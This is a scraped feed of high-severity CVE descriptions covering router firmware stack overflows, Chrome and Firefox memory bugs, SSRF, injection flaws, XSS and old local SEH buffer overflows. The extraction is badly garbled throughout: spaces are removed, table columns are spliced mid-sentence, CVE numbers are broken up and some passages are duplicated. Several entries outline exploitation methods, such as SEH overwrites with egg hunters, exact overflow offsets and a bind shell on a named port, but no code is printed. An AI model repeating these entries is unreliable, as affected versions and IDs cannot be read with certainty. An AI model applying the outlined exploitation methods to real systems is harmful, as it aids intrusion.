Details3334access,toappendadditionalSQLqueriesintoalreadyexistingqueriesthatcanbeusedtoextractsensitive informationfromthedatabase. AvulnerabilitywasfoundinD-LinkDIR-5131.10.ThisaffectsthefunctionformEasySetPasswordofthefileCVE-/goform/formEasySetPasswordofthecomponentWebService.ThemanipulationoftheargumentcurTimeresults More2026- 8.8instack-basedbufferoverflow.Theattackmaybeperformedfromremote.Theexploithasbeenmadepublicand Details4486couldbeused.Thisvulnerabilityonlyaffectsproductsthatarenolongersupportedbythemaintainer. CVE-AvulnerabilitywasdetectedinTendaA18Pro02.03.02.28.Thisvulnerabilityaffectsthefunction More2026-formfastsettingwifisetofthefile/goform/fastsettingwifiset.Themanipulationresultsinstack-basedbuffer 8.8 Details4489overflow.Theattackmaybelaunchedremotely.Theexploitisnowpublicandmaybeused. CVE-AflawhasbeenfoundinTendaA18Pro02.03.02.28.ThisissueaffectsthefunctionsetSchedWifiofthefile More2026-/goform/openSchedWifi.Thismanipulationcausesstack-basedbufferoverflow.Remoteexploitationoftheattack 8.8 Details4490ispossible.Theexploithasbeenpublishedandmaybeused. CVE-AvulnerabilityhasbeenfoundinTendaA18Pro02.03.02.28.ImpactedisthefunctionfromSetIpMacBindofthe More2026-file/goform/SetIpMacBind.Suchmanipulationoftheargumentlistleadstostack-basedbufferoverflow.Theattack 8.8 Details4491canbeexecutedremotely.Theexploithasbeendisclosedtothepublicandmaybeused. CVE-InappropriateimplementationinV8inGoogleChromepriorto146.0.7680.153allowedaremoteattackerto More2026- 8.8executearbitrarycodeinsideasandboxviaacraftedHTMLpage.(Chromiumsecurityseverity:High) Details4447 CVE-AvulnerabilitywasfoundinTendaA18Pro02.03.02.28.TheaffectedelementisthefunctionsetqosMiblistof More2026-thefile/goform/formSetQosBand.Performingamanipulationoftheargumentlistresultsinstack-basedbuffer 8.8 Details4492overflow.Theattackispossibletobecarriedoutremotely.Theexploithasbeenmadepublicandcouldbeused. CVE-AnImproperInputValidationvulnerabilityinUniFiNetworkServermayallowunauthorizedaccesstoanaccountif More2026-theaccountownerissociallyengineeredintoclickingamaliciouslink.AffectedProducts:UniFiNetworkServer 8.8 Details22559(Version10.1.85andearlier)Mitigation:UpdateUniFiNetworkServertoVersion10.1.89orlater. KanboardisprojectmanagementsoftwarefocusedonKanbanmethodology.Priorto1.2.51,Kanboard'suserCVE-inviteregistrationendpoint(UserInviteController::register())acceptsallPOSTparametersandpassesthemto More2026- 8.8UserModel::create()withoutfilteringouttherolefield.Anattackerwhoreceivesaninvitelinkcaninject Details29056role=app-adminintheregistrationformtocreateanadministratoraccount.Version1.2.51fixestheissue. AvulnerabilitywasdeterminedinTendaA18Pro02.03.02.28.Theimpactedelementisthefunctionsub423B50CVE-ofthefile/goform/setMacFilterCfgofthecomponentMACFilteringConfigurationEndpoint.Executinga More2026- 8.8manipulationoftheargumentdeviceListcanleadtostack-basedbufferoverflow.Theattackmaybeperformed Details4493fromremote.Theexploithasbeenpubliclydisclosedandmaybeutilized. CVE-AvulnerabilitywasidentifiedinUTTHiPER1250GWupto3.2.7-210907-180535.Affectedisthefunctionstrcpyof More2026-thefile/goform/setSysAdm.SuchmanipulationoftheargumentGroupNameleadstobufferoverflow.Itispossible 8.8 Details4488tolaunchtheattackremotely.Theexploitispubliclyavailableandmightbeused. CVE- UseafterfreeinBaseinGoogleChromepriorto146.0.7680.153allowedaremoteattackertopotentiallyexploit More 8.8heapcorruptionviaacraftedHTMLpage.(Chromiumsecurityseverity:Critical) Details
CVE- HeapbufferoverflowinCSSinGoogleChromepriorto146.0.7680.153allowedaremoteattackertopotentially More CVE- HeapbufferoverflowinCSSinGoogleChromepriorto146.0.7680.153allowedaremoteattackertopotentially More 8.8 Details CVE- HeapbufferoverflowinWebAudioinGoogleChromepriorto146.0.7680.153allowedaremoteattackerto More 8.8 executearbitrarycodeinsideasandboxviaacraftedHTMLpage.(Chromiumsecurityseverity:High) Details4443 CVE- DedeCMSv5.7.118wasdiscoveredtocontainaCross-SiteRequestForgery(CSRF)vulnerabilityin More2026- 8.8 /systaskadd.php. Details29839 CVE- UseafterfreeinWebRTCinGoogleChromepriorto146.0.7680.153allowedaremoteattackertopotentially More2026- 8.8 Details4446 CVE- StackbufferoverflowinWebRTCinGoogleChromepriorto146.0.7680.153allowedaremoteattackerto More2026- 8.8 potentiallyexploitstackcorruptionviaacraftedHTMLpage.(Chromiumsecurityseverity:High) Details4444
CVE- Priortoversions7.15.1and8.9.3,anLDAPInjectionvulnerabilityexistsintheSuiteCRMauthenticationflow.The More2026- applicationfailstoproperlysanitizeuser-suppliedinputbeforeembeddingitintotheLDAPsearchfilter.By 8.8 Details33289 injectingLDAPcontrolcharacters,anunauthenticatedattackercanmanipulatethequerylogic,whichcanleadto authenticationbypassorinformationdisclosure.Versions7.15.1and8.9.3patchtheissue.
Priortoversions7.15.1and8.9.3,aSQLInjectionvulnerabilityexistsintheSuiteCRMauthenticationmechanismsCVE-whendirectorysupportisenabled.Theapplicationfailstoproperlysanitizetheuser-suppliedusernamebefore More2026- 8.8usingitinalocaldatabasequery.Anattackerwithvalid,low-privilegedirectorycredentialscanexploitthisto Details33288executearbitrarySQLcommands,leadingtocompleteprivilegeescalation(e.g.,logginginastheCRM Administrator).Versions7.15.1and8.9.3patchtheissue. Frigateisanetworkvideorecorder(NVR)withrealtimelocalobjectdetectionforIPcameras.Versionspriorto 0.17.0-beta1allowanyauthenticatedusertochangetheirownpasswordwithoutverifyingthecurrentpassword throughthe/users/{username}/passwordendpoint.ChangingapassworddoesnotinvalidateexistingJWTtokens,CVE-andthereisnovalidationofpasswordstrength.Ifanattackerobtainsavalidsessiontoken(e.g.,viaaccidentally More2026- 8.8exposedJWT,stolencookie,XSS,compromiseddevice,orsniffingoverHTTP),theycanchangethevictim’s Details33124passwordandgainpermanentcontroloftheaccount.SincepasswordchangesdonotinvalidateexistingJWT tokens,sessionhijackspersistevenafterapasswordreset.Additionally,thelackofpasswordstrengthvalidation exposesaccountstobrute-forceattacks.Thisissuehasbeenresolvedinversion0.17.0-beta1. CVE-OutofboundsreadandwriteinWebGLinGoogleChromepriorto146.0.7680.153allowedaremoteattackerto More2026- 8.8performarbitraryread/writeviaacraftedHTMLpage.(Chromiumsecurityseverity:Critical) Details4440 CVE-UseafterfreeinWebRTCinGoogleChromepriorto146.0.7680.153allowedaremoteattackertopotentially More2026- 8.8 Details4445 Intakeisapackageforfinding,investigating,loadinganddisseminatingdata.Priortoversion2.0.9,theshell() CVE-syntaxwithinparameterdefaultvaluesappearstobeautomaticallyexpandedduringthecatalogparsingprocess. More2026-Ifacatalogcontainsaparameterdefaultsuchasshell(),thecommandmaybeexecutedwhenthe 8.8 Details33310catalogsourceisaccessed.ThismeansthatifauserloadsamaliciouscatalogYAML,embeddedcommandscould executeonthehostsystem.Version2.0.9mitigatestheissuebymakinggetshellFalsebydefaulteverywhere. Admidioisanopen-sourceusermanagementsolution.Versions5.0.6andbelowcontainacriticalunrestrictedfile uploadvulnerabilityintheDocuments&Filesmodule.DuetoadesignflawinhowCSRFtokenvalidationandfileCVE-extensionverificationinteractwithinUploadHandlerFile.php,anauthenticateduserwithuploadpermissionscan More2026- 8.8bypassfileextensionrestrictionsbyintentionallysubmittinganinvalidCSRFtoken.Thisallowstheuploadof Details32756arbitraryfiletypes,includingPHPscripts,whichmayleadtoRemoteCodeExecutionontheserver,resultinginfull servercompromise,dataexfiltration,andlateralmovement.Thisissuehasbeenfixedinversion5.0.7. PrecurioIntranetPortal4.4containsacross-siterequestforgeryvulnerabilitythatallowsattackerstoinduceCVE-authenticateduserstosubmitcraftedrequeststoaprofileupdateendpointhandlingfileuploads.Attackerscan More2026- 8.8exploitthistouploadexecutablefilestoweb-accessiblelocations,leadingtoarbitrarycodeexecutioninthe Details32989contextofthewebserver. TheLinksySearchandReplacepluginforWordPressisvulnerabletounauthorizedmodificationofdataduetoa CVE-missingcapabilitycheckonthe'linksysearchandreplaceitemdetails'functioninallversionsupto,and More2026-including,1.0.4.Thismakesitpossibleforauthenticatedattackers,withsubscriber-levelaccessandabove,to 8.8 Details2941updateanydatabasetable,anyvalue,includingthewpcapabilitiesdatabasefield,whichallowsattackersto changetheirownroletoadministrator,whichleadstoprivilegeescalation. CVE- 8.8HeapbufferoverflowinANGLEinGoogleChromepriorto146.0.7680.153allowedaremoteattackertopotentially More Details exploitheapcorruptionviaacraftedHTMLpage.(Chromiumsecurityseverity:High) Details LDAPAccountManager(LAM)isawebfrontendformanagingentries(e.g.users,groups,DHCPsettings)storedin anLDAPdirectory.Priortoversion9.5,alocalfileinclusionwasdetectedinthePDFexportthatallowsuserstoCVE-includelocalPHPfilesandthiswayexecutecode.IncombinationwithGHSA-88hf-2cjm-m9g8thisallowsto More 8.8executearbitrarycode.UsersneedtologintoLAMtoexploitthisvulnerability.Version9.5fixestheissue. Details27894Althoughupgradingisrecommended,aworkaroundwouldbetomake/var/lib/ldap-account-manager/configread- onlyfortheweb-serveruseranddeletethePDFprofilefiles(makingPDFexportsimpossible). CVE- More2026-PrivilegeescalationintheIPCcomponent.ThisvulnerabilityaffectsFirefox<149andThunderbird<149. 8.8 Details4722 CVE-AcriticalSQLinjectionvulnerabilityinSpringAI'sMariaDBFilterExpressionConverterallowsattackerstobypass More2026-metadata-basedaccesscontrolsandexecutearbitrarySQLcommands.Thevulnerabilityexistsduetomissing 8.8 Details22730inputsanitization. Roxy-WIisawebinterfaceformanagingHaproxy,Nginx,ApacheandKeepalivedservers.Priortoversion8.2.6.3, CVE-acommandinjectionvulnerabilityexistsinthe/config/compare/ / /showendpoint,allowed More2026-authenticateduserstoexecutearbitrarysystemcommandsontheapphost.Thevulnerabilityexistsin 8.8 Details27811app/modules/config/config.pyonline362,whereuserinputisdirectlyformattedinthetemplatestringthatis eventuallyexecuted.Version8.2.6.3fixestheissue. CVE-TheTerrapacksoftware,fromASTERTEC/ASTERS.p.A.,withtheindicatedcomponentsandversionshasafile More2025-uploadvulnerabilitythatmayallowattackerstoexecutearbitrarycode.VulnerablecomponentsincludeTerrapack 8.8 Details67260TkWebCoreNG::1.0.20200914,TerrapackTKServerCGI2.5.4.150,andTerrapackTpkWebGISClient1.0.0.
CVE- to8.0.0.2,astoredcross-sitescripting(XSS)vulnerabilityinthepatientportalpaymentflowallowsapatient More2026- portalusertopersistarbitraryJavaScriptthatexecutesinthebrowserofastaffmemberwhoreviewsthe 8.7 Details33346 paymentsubmission.Thepayloadisstoredviaportal/lib/paylib.phpandrenderedwithoutescapingin portal/portal_payment.php.Version8.0.0.2fixestheissue. Versionsofthepackagejsrsasignbefore11.1.1arevulnerabletoMissingCryptographicStepviatheCVE- KJUR.crypto.DSA.signWithMessageHashprocessintheDSAsigningimplementation.Anattackercanrecoverthe More2026- 8.7 privatekeybyforcingrorstobezero,sothelibraryemitsaninvalidsignaturewithoutretrying,andthensolves Details4601 forxfromtheresultingsignature. Budibaseisalowcodeplatformforcreatinginternaltools,workflows,andadminpanels.Inversionsfrom3.30.6 andprior,theRESTdatasourcequerypreviewendpoint(POST/api/queries/preview)makesserver-sideHTTP CVE- requeststoanyURLsuppliedbytheuserinfields.pathwithnovalidation.Anauthenticatedadmincanreach More2026- internalservicesthatarenotexposedtotheinternet—includingcloudmetadataendpoints(AWS/GCP/Azure), 8.7 Details33226 internaldatabases,KubernetesAPIs,andotherpodsontheinternalnetwork.OnGCPthisleadstoOAuth2token theftwithcloud-platformscope(fullGCPaccess).Onanydeploymentitenablesfullinternalnetworkenumeration. Attimeofpublication,therearenopubliclyavailablepatches. StatamicisaLaravelandGitpoweredcontentmanagementsystem(CMS).Priortoversions5.73.14and6.7.0,aCVE- storedXSSvulnerabilityinSVGassetreuploadsallowsauthenticateduserswithassetuploadpermissionsto More2026- 8.7 bypassSVGsanitizationandinjectmaliciousJavaScriptthatexecuteswhentheassetisviewed.Thishasbeen Details33172 fixedin5.73.14and6.7.0. CVE- Connect-CMSisacontentmanagementsystem.Inversions1.35.0through1.41.0and2.35.0through2.41.0,a More2026- DOM-basedCross-SiteScripting(XSS)issueexistsintheCabinetPluginlistview.Versions1.41.1and2.41.1 8.7 Details32277 ImproperRestrictionofXMLExternalEntityReferencevulnerabilityinXMLUtils.javainSlovensko.DigitalAutogram CVE- allowsremoteunauthenticatedattackertoconductSSRF(ServerSideRequestForgery)attacksandobtain More2026- unauthorizedaccesstolocalfilesonfilesystemsrunningthevulnerableapplication.Successfulexploitation 8.6 Details3511 requiresthevictimtovisitaspeciallycraftedwebsitethatsendsrequestcontainingaspeciallycraftedXML documentto/signendpointofthelocalHTTPserverrunbytheapplication. OpenNeuralNetworkExchange(ONNX)isanopenstandardformachinelearninginteroperability.Inversionsup toandincluding1.20.1,asecuritycontrolbypassexistsinonnx.hub.load()duetoimproperlogicintherepository trustverificationmechanism.Whilethefunctionisdesignedtowarnuserswhenloadingmodelsfromnon-officialCVE- sources,theuseofthesilent=Trueparametercompletelysuppressesallsecuritywarningsandconfirmation More2026- 8.6 prompts.Thisvulnerabilitytransformsastandardmodel-loadingfunctionintoavectorforZero-InteractionSupply- Details28500 ChainAttacks.Whenchainedwithfile-systemvulnerabilities,anattackercansilentlyexfiltratesensitivefiles(SSH keys,cloudcredentials)fromthevictim'smachinethemomentthemodelisloaded.Asoftimeofpublication,no knownpatchedversionsareavailable. CVE- ExposureofsensitiveinformationtoanunauthorizedactorinAzureDataFactoryallowsanunauthorizedattacker More 8.6 todiscloseinformationoveranetwork. Details23659
Allure2istheversion2.xbranchofAllureReport,amulti-languagetestreportingtool.TheAllurereportgenerator
CVE- priortoversion2.38.0isvulnerabletoanarbitraryfilereadviapathtraversalwhenprocessingtestresults.An More attackercancraftamaliciousresultfile(-result.json,-container.json,or.plist)thatpointsanattachmentsourceto 8.6 Details33166 asensitivefileonthehostsystem.Duringreportgeneration,Allurewillresolvethesepathsandincludethe sensitivefilesinthefinalreport.Version2.38.0fixestheissue. Kanisanopen-sourceprojectmanagementtool.Inversions0.5.4andbelow,the/api/download/attatchment endpointhasnoauthenticationandnoURLvalidation.TheAttachmentDownloadendpointacceptsauser-CVE- suppliedURLqueryparameterandpassesitdirectlytofetch()server-side,andreturnsthefullresponsebody.An More2026- 8.6 unauthenticatedattackercanusethistomakeHTTPrequestsfromtheservertointernalservices,cloudmetadata Details32255 endpoints,orprivatenetworkresources.Thisissuehasbeenfixedinversion0.5.5.Toworkaroundthisissue, blockorrestrictaccessto/api/download/attatchmentatthereverseproxylevel(nginx,Cloudflare,etc.). Free5GCisanopen-sourceLinuxFoundationprojectfor5thgeneration(5G)mobilecorenetworks.Versionsprior to1.4.2arevulnerabletonullbyteinjectioninURLpathparameters.Aremoteattackercaninjectnullbytes(URL- encodedas%00)intothesupipathparameteroftheUDM'sNudmSubscriberDataManagementAPI.ThiscausesCVE- URLparsingfailureinGo'snet/urlpackagewiththeerror"invalidcontrolcharacterinURL",resultingina500 More2026- 8.6 InternalServerError.Thisnullbyteinjectionvulnerabilitycanbeexploitedfordenialofserviceattacks.Whenthe Details33191 supiparametercontainsnullcharacters,theUDMattemptstoconstructaURLforUDRthatincludesthesecontrol characters.Go'sURLparserrejectsthem,causingtherequesttofailwith500insteadofproperlyvalidatinginput andreturning400BadRequest.Thisissuehasbeenfixedinversion1.4.2. CVE- Server-siderequestforgery(ssrf)inMicrosoftPurviewallowsanunauthorizedattackertoelevateprivilegesovera More2026- 8.6 network. Details26138 CVE- Server-siderequestforgery(ssrf)inMicrosoftPurviewallowsanunauthorizedattackertoelevateprivilegesovera More2026- 8.6 network. Details26139 WWBNAVideoisanopensourcevideoplatform.Inversionsuptoandincluding26.0,theisSSRFSafeURL() CVE- functioninAVideocanbebypassedusingIPv4-mappedIPv6addresses(::ffff:x.x.x.x).Theunauthenticated More2026- plugin/LiveLinks/proxy.phpendpointusesthisfunctiontovalidateURLsbeforefetchingthemwithcurl,butthe 8.6 Details33480 IPv4-mappedIPv6prefixpassesallchecks,allowinganattackertoaccesscloudmetadataservices,internal networks,andlocalhostservices.Commit75ce8a579a58c9d4c7aafe453fbced002cb8f373containsapatch. WWBNAVideoisanopensourcevideoplatform.Inversionsuptoandincluding26.0,anunauthenticatedAPI endpoint(APIName=locale)concatenatesuserinputintoanincludepathwithnocanonicalizationorwhitelist.CVE- Pathtraversalisaccepted,soarbitraryPHPfilesunderthewebrootcanbeincluded.Inourtestthisyielded More2026- 8.6 confirmedfiledisclosureandcodeexecutionofexistingPHPcontent(e.g.,view/about.php),anditcan Details33513 escalatetoRCEifanattackercanplaceorcontrolaPHPfileelsewhereinthetree.Asoftimeofpublication,no patchedversionsareavailable. WWBNAVideoisanopensourcevideoplatform.Inversionsuptoandincluding26.0,theCDNpluginendpoints plugin/CDN/status.json.phpandplugin/CDN/disable.json.phpusekey-basedauthenticationwithanemptyCVE- stringdefaultkey.WhentheCDNpluginisenabledbutthekeyhasnotbeenconfigured(thedefaultstate),the More2026- 8.6 keyvalidationcheckiscompletelybypassed,allowinganyunauthenticatedattackertomodifythefullCDN Details33719 configuration—includingCDNURLs,storagecredentials,andtheauthenticationkeyitself—viamass-assignment throughtheparrequestparameter.Commitadeff0a31ba04a56f411eef256139fd7ed7d4310containsapatch. WWBNAVideoisanopensourcevideoplatform.Inversions25.0andbelow,theplugin/LiveLinks/proxy.php CVE- endpointvalidatesuser-suppliedURLsagainstinternal/privatenetworksusingisSSRFSafeURL(),butonlychecks More2026- theinitialURL.WhentheinitialURLrespondswithanHTTPredirect(Locationheader),theredirecttargetis 8.6 Details33039 fetchedviafakeBrowser()withoutre-validation,allowinganattackertoreachinternalservices(cloudmetadata, RFC1918addresses)throughanattacker-controlledredirect.Thisissueisfixedinversion26.0. CVE- InsufficientlyprotectedcredentialsinAzureDevOpsallowsanunauthorizedattackertoelevateprivilegesovera More2026- 8.6 network. Details23658 VulnerabilityinSpringCloudwhensubstitutingtheprofileparameterfromarequestmadetotheSpringCloudCVE- ConfigServerconfiguredtothenativefilesystemasabackend,becauseitwaspossibletoaccessfilesoutsideof More2026- 8.6 theconfiguredsearchdirectories.ThisissueaffectsSpringCloud:from3.1.Xbefore3.1.13,from4.1.Xbefore Details22739 4.1.9,from4.2.Xbefore4.2.3,from4.3.Xbefore4.3.2,from5.0.Xbefore5.0.2. LuCIistheOpenWrtConfigurationInterface.Versionspriortoboth24.10.5and25.12.0,containastoredXSS vulnerabilityinthewirelessscanmodal,whereSSIDvaluesfromscanresultsarerenderedasrawHTMLwithout anysanitization.Thewireless.jsfileintheluci-mod-networkpackagepassesSSIDsviaatemplateliteralto CVE- dom.append(),whichprocessesthemthroughinnerHTML,allowinganattackertocraftamaliciousSSID More2026- 8.6 containingarbitraryHTML/JavaScript.Exploitationrequirestheusertoactivelyopenthewirelessscanmodal(e.g., Details32721 toconnecttoaWi-Fiaccesspointorsurveynearbychannels),andonlyaffectsOpenWrtversionsnewerthan 23.05/22.03uptothepatchedreleases(24.10.6and25.12.1).TheissuehasbeenfixedinversionLuCI 26.072.65753~068150b. CVE- Sandboxescapeduetoincorrectboundaryconditions,integeroverflowintheXPCOMcomponent.This More vulnerabilityaffectsFirefox<149,FirefoxESR<115.34,FirefoxESR<140.9,Thunderbird<149,and 8.6 vulnerabilityaffectsFirefox<149,FirefoxESR<115.34,FirefoxESR<140.9,Thunderbird<149,and 8.6 Details Thunderbird<140.9. AJSONPathinjectionvulnerabilityinSpringAI'sAbstractFilterExpressionConverterallowsauthenticatedusersto bypassmetadata-basedaccesscontrolsthroughcraftedfilterexpressions.User-controlledinputpassedto FilterExpressionBuilderisconcatenatedintoJSONPathquerieswithoutproperescaping,enablingattackerstoCVE- injectarbitraryJSONPathlogicandaccessunauthorizeddocuments.Thisvulnerabilityaffectsapplicationsusing More2026- 8.6 vectorstoresthatextendAbstractFilterExpressionConverterformulti-tenantisolation,role-basedaccesscontrol, Details22729 ordocumentfilteringbasedonmetadata.Thevulnerabilityoccurswhenuser-suppliedvaluesinfilterexpressions arenotescapedbeforebeinginsertedintoJSONPathqueries.Specialcharacterslike",||,and&&arepassed throughunescaped,allowinginjectionofarbitraryJSONPathlogicthatcanaltertheintendedquerysemantics. CVE- SandboxescapeduetoincorrectboundaryconditionsintheTelemetrycomponent.Thisvulnerabilityaffects More2026- 8.6 Firefox<149,FirefoxESR<115.34,FirefoxESR<140.9,Thunderbird<149,andThunderbird<140.9. Details4687 MariaDBserverisacommunitydevelopedforkofMySQLserver.AnauthenticatedusercancrashMariaDB CVE- versions11.4before11.4.10and11.8before11.8.6viaabuginJSONSCHEMAVALID()function.Undercertain More2026- conditionsitmightbepossibletoturnthecrashintoaremotecodeexecution.Theseconditionsrequiretight 8.5 Details32710 controlovermemorylayoutwhichisgenerallyonlyattainableinalabenvironment.ThisissueisfixedinMariaDB 11.4.10,MariaDB11.8.6,andMariaDB12.2.2. IperiusBackup6.1.0containsaprivilegeescalationvulnerabilitythatallowslow-privilegeuserstoexecute CVE- arbitraryprogramswithelevatedprivilegesbycreatingbackupjobs.Attackerscanconfigurebackupjobsto More2019- executemaliciousbatchfilesorprogramsbeforeorafterbackupoperations,whichrunwiththeprivilegesofthe 8.4 Details25608 IperiusBackupServiceaccount(LocalSystemorAdministrator),enablingprivilegeescalationandarbitrarycode execution. FlexHEX2.71containsalocalbufferoverflowvulnerabilityintheStreamNamefieldthatallowslocalattackerstoCVE- executearbitrarycodebytriggeringastructuredexceptionhandler(SEH)overflow.Attackerscancrafta More2019- 8.4 malicioustextfilewithcarefullyalignedshellcodeandSEHchainpointers,pastethecontentsintotheStream Details25627 Namedialog,andexecutearbitrarycommandslikecalc.exewhentheexceptionhandleristriggered. LavavoCDRipper4.20containsastructuredexceptionhandling(SEH)bufferoverflowvulnerabilitythatallowsCVE- localattackerstoexecutearbitrarycodebysupplyingamaliciousstringintheLicenseActivationNamefield. More2019- 8.4 Attackerscancraftapayloadwithcontrolledbufferdata,NSEHjumpinstructions,andSEHhandleraddressesto Details25615 triggercodeexecutionandestablishabindshellonport3110. Base64Decoder1.1.2containsastack-basedbufferoverflowvulnerabilitythatallowslocalattackerstoexecuteCVE- arbitrarycodebytriggeringastructuredexceptionhandler(SEH)overwrite.Attackerscancraftamaliciousinput More2019- 8.4 filethatoverflowsabuffer,overwritestheSEHchainwithaPOP-POP-RETgadgetaddress,andusesanegghunter Details25634 payloadtolocateandexecuteshellcodeforcodeexecution. AIDA64Extreme5.99.4900containsastructuredexceptionhandlingbufferoverflowvulnerabilitythatallowslocalCVE- attackerstoexecutearbitrarycodebysupplyingmaliciousinputthroughtheemailpreferencesandreportwizard More2019- 8.4 interfaces.AttackerscaninjectcraftedpayloadsintotheDisplaynamefieldandLoadfromfileparameterto Details25633 triggertheoverflowandexecuteshellcodewithapplicationprivileges. CVE- Axessh4.2containsastack-basedbufferoverflowvulnerabilityinthelogfilenamefieldthatallowslocalattackers More2019- toexecutearbitrarycodebysupplyinganexcessivelylongfilename.Attackerscanoverflowthebufferatoffset 8.4 Details25607 214bytestooverwritetheinstructionpointerandexecuteshellcodewithsystemprivileges. AIDA64Business5.99.4900containsastructuredexceptionhandlingbufferoverflowvulnerabilitythatallowslocalCVE- attackerstoexecutearbitrarycodebyoverwritingSEHpointerswithmaliciousshellcode.Attackerscaninjectegg More2019- 8.4 huntershellcodethroughtheSMTPdisplaynamefieldinpreferencesorreportwizardfunctionalitytotriggerthe Details25631 overflowandexecutecodewithapplicationprivileges. AIDA64Extreme5.99.4900containsastructuredexceptionhandlerbufferoverflowvulnerabilityintheloggingCVE- functionalitythatallowslocalattackerstoexecutearbitrarycodebysupplyingamaliciousCSVlogfilepath. More2019- 8.4 AttackerscaninjectshellcodethroughtheHardwareMonitoringloggingpreferencestooverflowthebufferand Details25629 triggercodeexecutionwhentheapplicationprocessesthelogfilepath. X-NetStatPro5.63containsalocalbufferoverflowvulnerabilitythatallowslocalattackerstoexecutearbitraryCVE- codebyoverwritingtheEIPregisterthrougha264-bytebufferoverflow.Attackerscaninjectshellcodeinto More2019- 8.4 memoryanduseanegghuntertechniquetolocateandexecutethepayloadwhentheapplicationprocesses Details25637 maliciousinputthroughHTTPClientorRulesfunctionality. TuneClone2.20containsastructuredexceptionhandler(SEH)bufferoverflowvulnerabilitythatallowslocal CVE- attackerstoexecutearbitrarycodebysupplyingamaliciouslicensecodestring.Attackerscancraftapayload More2019- 8.4 withacontrolledbuffer,NSEHjumpinstruction,andSEHhandleraddresspointingtoaROPgadget,thenpasteit Details25603 intothelicensecodefieldtotriggercodeexecutionandestablishabindshell. FTPShellServer6.83containsabufferoverflowvulnerabilityinthe'Accountnametoban'fieldthatallowslocalCVE- attackerstoexecutearbitrarycodebysupplyingacraftedstring.Attackerscaninjectshellcodethroughthe More accountnameparameterintheManageFTPAccountsdialogtooverwritethereturnaddressandexecutecalc.exe Details 8.4 orothercommands.25619 orothercommands.25619 RiverPastCamDo3.7.6containsalocalbufferoverflowvulnerabilityintheactivationcodeinputfieldthatallowsCVE- localattackerstoexecutearbitrarycodebysupplyingamaliciousactivationcodestring.Attackerscancrafta More 8.4 buffercontaining608bytesofjunkdatafollowedbyshellcodeandSEHchainoverwritevaluestotriggercode Details25626 executionwhentheactivationdialogprocessestheinput. DVDXPlayerPro5.5containsalocalbufferoverflowvulnerabilitywithstructuredexceptionhandlingthatallowsCVE- localattackerstoexecutearbitrarycodebycraftingmaliciousplaylistfiles.Attackerscancreateaspecially More2019- 8.4 crafted.plffilecontainingshellcodeandNOPsledsthatoverflowsabufferandhijackstheSEHchaintoexecute Details25604 arbitrarycodewithapplicationprivileges. cgltfversion1.15andpriorcontainanintegeroverflowvulnerabilityinthecgltfvalidate()functionwhen CVE- validatingsparseaccessorsthatallowsattackerstotriggerout-of-boundsreadsbysupplyingcraftedglTF/GLB More2026- inputfileswithattacker-controlledsizevalues.Attackerscanexploituncheckedarithmeticoperationsinsparse 8.4 Details32845 accessorvalidationtocauseheapbufferover-readsincgltfcalcindexbound(),resultingindenialofservice crashesandpotentialmemorydisclosure. JetAudiojetCastServer2.0containsastack-basedbufferoverflowvulnerabilityintheLogDirectoryconfigurationCVE- fieldthatallowslocalattackerstooverwritestructuredexceptionhandlingpointers.Attackerscaninject More2019- 8.4 alphanumericencodedshellcodethroughtheLogDirectoryfieldtotriggeranSEHexceptionhandlerandexecute Details25609 arbitrarycodewithapplicationprivileges. MiniFtpcontainsabufferoverflowvulnerabilityintheparseconfloadsettingfunctionthatallowslocalattackersCVE- toexecutearbitrarycodebysupplyingoversizedconfigurationvalues.Attackerscancraftaminiftpd.conffilewith More2019- 8.4 valuesexceeding128bytestooverflowstackbuffersandoverwritethereturnaddress,enablingcodeexecution Details25611 withrootprivileges. CVE- ImpropercertificatevalidationinDevolutionsHubReportingService2025.3.1.1andearlierallowsanetwork More2026- 8.3 attackertoperformaman-in-the-middleattackviadisabledTLScertificateverification. Details4396 TheMimeTypesLinkIconspluginforWordPressisvulnerabletoServer-SideRequestForgeryinallversionsupto, andincluding,3.2.20.ThisisduetothepluginmakingoutboundHTTPrequeststouser-controlledURLswithoutCVE- propervalidationwhenthe"Showfilesize"optionisenabled.Thismakesitpossibleforauthenticatedattackers, More2026- 8.3 withContributor-levelaccessandabove,tomakewebrequeststoarbitrarylocationsoriginatingfromtheweb Details1313 applicationandcanbeusedtoqueryandmodifyinformationfrominternalservicesviacraftedlinksinpost content. CVE- More2026- versionsonthe2.xseriesuptoandincluding2.41.0,aStoredCross-siteScripting(XSS)issueexistsinthefile 8.2 Details32278 fieldoftheFormPlugin.Versions1.41.1and2.41.1containapatch. eNdonesiaPortalv8.7containsmultipleSQLinjectionvulnerabilitiesthatallowunauthenticatedattackerstoCVE- executearbitrarySQLqueriesbyinjectingmaliciouscodethroughthebidparameter.AttackerscansendGET More2019- 8.2 requeststobanners.phpwithcraftedSQLpayloadsinthebidparametertoextractsensitivedatabaseinformation Details25643 fromtheINFORMATIONSCHEMAtables. oRPCisantoolthathelpsbuildAPIsthatareend-to-endtype-safeandadheretoOpenAPIstandards.Priorto CVE- version1.13.9,astoredcross-sitescripting(XSS)vulnerabilityexistsintheOpenAPIdocumentationgenerationof More2026- orpc.IfanattackercancontrolanyfieldwithintheOpenAPIspecification(suchasinfo.description),theycanbreak 8.2 Details33331 outoftheJSONcontextandexecutearbitraryJavaScriptwhenauserviewsthegeneratedAPIdocumentation. Thisissuehasbeenpatchedinversion1.13.9. ZeewaysMatrimonyCMScontainsmultipleSQLinjectionvulnerabilitiesthatallowunauthenticatedattackerstoCVE- manipulatedatabasequeriesthroughtheprofilelistendpoint.AttackerscaninjectSQLcodeviatheupcast, More2019- 8.2 smother,andsreligionparameterstoextractsensitivedatabaseinformationusingtime-basedorerror-based Details25635 techniques. phpTransformer2016.9containsanSQLinjectionvulnerabilitythatallowsremoteattackerstoexecutearbitraryCVE- SQLqueriesbyinjectingmaliciouscodethroughtheidnewsparameter.AttackerscansendcraftedGETrequests More2019- 8.2 toGeneratePDF.phpwithSQLpayloadsintheidnewsparametertoextractsensitivedatabaseinformationor Details25578 manipulatequeries. SpringBootapplicationswithActuatorcanbevulnerabletoan"AuthenticationBypass"vulnerabilitywhenanCVE- applicationendpointthatrequiresauthenticationisdeclaredunderthepathusedbytheCloudFoundryActuator More2026- 8.2 endpoints.ThisissueaffectsSpringSecurity:from4.0.0through4.0.3,from3.5.0through3.5.11,from3.4.0 Details22733 through3.4.14,from3.3.0through3.3.17,from2.7.0through2.7.31. Kyselyisatype-safeTypeScriptSQLquerybuilder.Versionsuptoandincluding0.28.11hasaSQLinjection vulnerabilityinJSONpathcompilationforMySQLandSQLitedialects.ThevisitJSONPathLeg()functionappends 